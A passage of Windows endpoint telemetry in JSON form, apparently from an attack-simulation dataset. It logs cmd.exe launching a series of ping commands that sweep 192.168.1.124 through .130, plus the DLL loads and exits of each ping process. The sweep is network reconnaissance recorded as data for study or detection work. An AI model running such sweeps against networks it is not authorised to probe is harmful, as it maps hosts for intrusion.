- "image_name": "mswsock.dll", - "image_path": 
"C:\\Windows\\System32\\mswsock.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "process", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572586990000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.124", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7460, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { 
- "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 
7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "process", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572591990000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.125", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1376, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": 
"kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1376, - "process_name": "PING.EXE", 
- "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "process", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572596990000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.126", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6080, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "process", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572601830000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.127", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6392, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572601990000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "process", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572606990000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.128", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 764, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", 
- "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607300000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "process", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572611990000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.129", - "event_type": "process", - "logon_id": 
217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": 
"{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "process", - "pid": 5976, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572616840000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.130", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7928, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" 
